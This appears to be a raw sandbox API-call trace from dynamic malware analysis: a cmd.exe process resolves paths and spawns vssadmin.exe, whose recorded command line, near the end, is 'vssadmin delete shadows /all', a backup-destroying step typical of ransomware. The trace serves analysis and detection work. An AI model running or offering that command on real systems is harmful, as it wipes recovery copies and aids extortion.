(_String1="PROMPT", _String2="DATE") returned 12 [0037.889] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0037.889] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0037.889] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0037.889] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0037.889] GetProcessHeap () returned 0x350000 [0037.889] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x362b18 | out: hHeap=0x350000) returned 1 [0037.889] GetEnvironmentStringsW () returned 0x362258* [0037.889] GetProcessHeap () returned 0x350000 [0037.889] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xae2) returned 0x364bb8 [0037.889] FreeEnvironmentStringsW (penv=0x362258) returned 1 [0037.889] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.889] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0037.889] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0037.889] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0037.889] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0037.889] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0037.889] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0037.889] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0037.889] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0037.889] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0037.889] GetProcessHeap () returned 0x350000 [0037.889] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x54) returned 0x3656a8 [0037.889] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef66c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0037.889] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef66c, lpFilePart=0x2ef668 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef668*="Desktop") returned 0x25 [0037.889] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0037.890] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef3e8 | out: lpFindFileData=0x2ef3e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x361ec0 [0037.890] FindClose (in: hFindFile=0x361ec0 | out: hFindFile=0x361ec0) returned 1 [0037.890] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef3e8 | out: lpFindFileData=0x2ef3e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x361ec0 [0037.890] FindClose (in: hFindFile=0x361ec0 | out: hFindFile=0x361ec0) returned 1 [0037.890] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0037.890] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef3e8 | out: lpFindFileData=0x2ef3e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x174c0690, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x174c0690, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x361ec0 [0037.890] FindClose (in: hFindFile=0x361ec0 | out: hFindFile=0x361ec0) returned 1 [0037.890] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0037.890] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0037.890] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0037.890] GetProcessHeap () returned 0x350000 [0037.890] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364bb8 | out: hHeap=0x350000) returned 1 [0037.890] GetEnvironmentStringsW () returned 0x3640c8* [0037.890] GetProcessHeap () returned 0x350000 [0037.891] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb36) returned 0x365f08 [0037.891] FreeEnvironmentStringsW (penv=0x3640c8) returned 1 [0037.891] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f15260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0037.891] GetProcessHeap () returned 0x350000 [0037.891] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3656a8 | out: hHeap=0x350000) returned 1 [0037.891] GetProcessHeap () returned 0x350000 [0037.891] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400e) returned 0x366a48 [0037.891] GetProcessHeap () returned 0x350000 [0037.891] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x46) returned 0x361ec0 [0037.891] GetProcessHeap () returned 0x350000 [0037.891] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x366a48 | out: hHeap=0x350000) returned 1 [0037.891] GetConsoleOutputCP () returned 0x1b5 [0037.891] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f14260 | out: lpCPInfo=0x49f14260) returned 1 [0037.891] GetUserDefaultLCID () returned 0x409 [0037.892] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f14950, cchData=8 | out: lpLCData=":") returned 2 [0037.892] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef7ac, cchData=128 | out: lpLCData="0") returned 2 [0037.892] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef7ac, cchData=128 | out: lpLCData="0") returned 2 [0037.892] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef7ac, cchData=128 | out: lpLCData="1") returned 2 [0037.892] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f14940, cchData=8 | out: lpLCData="/") returned 2 [0037.892] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f14d80, cchData=32 | out: lpLCData="Mon") returned 4 [0037.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f14d40, cchData=32 | out: lpLCData="Tue") returned 4 [0037.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f14d00, cchData=32 | out: lpLCData="Wed") returned 4 [0037.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f14cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0037.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f14c80, cchData=32 | out: lpLCData="Fri") returned 4 [0037.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f14c40, cchData=32 | out: lpLCData="Sat") returned 4 [0037.893] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f14c00, cchData=32 | out: lpLCData="Sun") returned 4 [0037.893] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f14930, cchData=8 | out: lpLCData=".") returned 2 [0037.893] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f14920, cchData=8 | out: lpLCData=",") returned 2 [0037.893] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0037.894] GetProcessHeap () returned 0x350000 [0037.894] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x20c) returned 0x362dd0 [0037.894] GetConsoleTitleW (in: lpConsoleTitle=0x362dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0037.894] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0037.894] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0037.894] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0037.895] GetProcessHeap () returned 0x350000 [0037.895] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x366a48 [0037.895] GetProcessHeap () returned 0x350000 [0037.895] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x366a48 | out: hHeap=0x350000) returned 1 [0037.896] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0037.896] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0037.896] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0037.896] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0037.896] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0037.896] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0037.896] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0037.896] GetProcessHeap () returned 0x350000 [0037.896] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x58) returned 0x362fe8 [0037.896] GetProcessHeap () returned 0x350000 [0037.896] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x1a) returned 0x365748 [0037.897] GetProcessHeap () returned 0x350000 [0037.897] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x32) returned 0x363048 [0037.897] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.898] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0037.898] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0037.898] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0037.898] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0037.898] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0037.898] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0037.898] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0037.898] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0037.898] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0037.898] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0037.898] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0037.898] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0037.898] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0037.898] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0037.898] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0037.898] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0037.898] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0037.898] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0037.898] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0037.898] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0037.898] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0037.898] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0037.898] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0037.898] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0037.898] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0037.899] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0037.899] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0037.899] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0037.899] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0037.899] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0037.899] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0037.899] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0037.899] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0037.899] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0037.899] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0037.899] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0037.899] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0037.899] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0037.899] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0037.899] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0037.899] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0037.899] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0037.899] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0037.899] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0037.899] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0037.899] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0037.899] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0037.899] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0037.899] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0037.899] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0037.899] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0037.899] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0037.899] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0037.899] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0037.899] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0037.899] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0037.899] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0037.899] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0037.900] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0037.900] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0037.900] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0037.900] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0037.900] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0037.900] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0037.900] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0037.900] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0037.900] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0037.900] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0037.900] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0037.900] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0037.900] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0037.900] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0037.900] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0037.900] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0037.900] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0037.900] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0037.900] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0037.900] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0037.900] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0037.900] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0037.900] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0037.900] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0037.900] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0037.900] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0037.900] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0037.900] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0037.900] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0037.901] GetProcessHeap () returned 0x350000 [0037.901] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x210) returned 0x363088 [0037.901] GetProcessHeap () returned 0x350000 [0037.901] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x44) returned 0x3632a0 [0037.901] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0037.901] GetProcessHeap () returned 0x350000 [0037.901] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x418) returned 0x3507f0 [0037.901] SetErrorMode (uMode=0x0) returned 0x0 [0037.901] SetErrorMode (uMode=0x1) returned 0x0 [0037.901] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3507f8, lpFilePart=0x2eefc4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2eefc4*="Desktop") returned 0x25 [0037.901] SetErrorMode (uMode=0x0) returned 0x1 [0037.901] GetProcessHeap () returned 0x350000 [0037.901] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x3507f0, Size=0x66) returned 0x3507f0 [0037.901] GetProcessHeap () returned 0x350000 [0037.901] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3507f0) returned 0x66 [0037.901] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.901] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.901] GetProcessHeap () returned 0x350000 [0037.901] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x120) returned 0x3632f0 [0037.902] GetProcessHeap () returned 0x350000 [0037.902] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x238) returned 0x350860 [0037.907] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x350860, Size=0x122) returned 0x350860 [0037.907] GetProcessHeap () returned 0x350000 [0037.907] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x350860) returned 0x122 [0037.907] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f20640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.908] GetProcessHeap () returned 0x350000 [0037.908] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe0) returned 0x363418 [0037.908] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x363418, Size=0x76) returned 0x363418 [0037.908] GetProcessHeap () returned 0x350000 [0037.908] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x363418) returned 0x76 [0037.910] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eed40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eed40) returned 0xffffffff [0037.910] GetLastError () returned 0x2 [0037.910] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x2eed40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eed40) returned 0xffffffff [0037.910] GetLastError () returned 0x2 [0037.910] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eed40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eed40) returned 0x363498 [0037.910] GetProcessHeap () returned 0x350000 [0037.910] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x14) returned 0x3634d8 [0037.910] FindClose (in: hFindFile=0x363498 | out: hFindFile=0x363498) returned 1 [0037.910] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x2eed40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eed40) returned 0xffffffff [0037.910] GetLastError () returned 0x2 [0037.911] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eed40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eed40) returned 0x363498 [0037.911] GetProcessHeap () returned 0x350000 [0037.911] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x3634d8, Size=0x4) returned 0x3634d8 [0037.911] FindClose (in: hFindFile=0x363498 | out: hFindFile=0x363498) returned 1 [0037.911] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.911] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.911] GetConsoleTitleW (in: lpConsoleTitle=0x2ef238, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.911] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef0c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef188 | out: lpAttributeList=0x2ef0c0, lpSize=0x2ef188) returned 1 [0037.911] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef0c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef180, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef0c0, lpPreviousValue=0x0) returned 1 [0037.911] GetStartupInfoW (in: lpStartupInfo=0x2ef07c | out: lpStartupInfo=0x2ef07c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0038.050] CloseHandle (hObject=0x74) returned 1 [0038.050] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0038.050] GetProcessHeap () returned 0x350000 [0038.050] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x365f08 | out: hHeap=0x350000) returned 1 [0038.050] GetEnvironmentStringsW () returned 0x365f08* [0038.050] GetProcessHeap () returned 0x350000 [0038.050] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb36) returned 0x3640c8 [0038.050] FreeEnvironmentStringsW (penv=0x365f08) returned 1 [0038.050] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0038.895] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2ef05c | out: lpExitCode=0x2ef05c*=0x0) returned 1 [0038.895] CloseHandle (hObject=0x78) returned 1 [0038.895] _vsnwprintf (in: _Buffer=0x2ef1a4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef068 | out: _Buffer="00000000") returned 8 [0038.895] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0038.895] GetProcessHeap () returned 0x350000 [0038.895] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3640c8 | out: hHeap=0x350000) returned 1 [0038.895] GetEnvironmentStringsW () returned 0x3640c8* [0038.895] GetProcessHeap () returned 0x350000 [0038.896] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb5c) returned 0x3695b0 [0038.896] FreeEnvironmentStringsW (penv=0x3640c8) returned 1 [0038.896] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0038.896] GetProcessHeap () returned 0x350000 [0038.896] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3695b0 | out: hHeap=0x350000) returned 1 [0038.896] GetEnvironmentStringsW () returned 0x3640c8* [0038.896] GetProcessHeap () returned 0x350000 [0038.896] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb5c) returned 0x3695b0 [0038.896] FreeEnvironmentStringsW (penv=0x3640c8) returned 1 [0038.896] GetProcessHeap () returned 0x350000 [0038.896] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x35ff18 | out: hHeap=0x350000) returned 1 [0038.896] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef0c0 | out: lpAttributeList=0x2ef0c0) [0038.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.896] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0038.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0038.896] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f141ac | out: lpMode=0x49f141ac) returned 1 [0038.896] _get_osfhandle (_FileHandle=0) returned 0x3 [0038.896] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f141b0 | out: lpMode=0x49f141b0) returned 1 [0038.897] SetConsoleInputExeNameW () returned 0x1 [0038.897] GetConsoleOutputCP () returned 0x1b5 [0038.897] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f14260 | out: lpCPInfo=0x49f14260) returned 1 [0038.897] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.897] exit (_Code=0) Process: id = "3" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x4d429000" os_pid = "0xa58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x9f8" cmd_line = "vssadmin delete shadows /all" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 10 os_tid = 0xa5c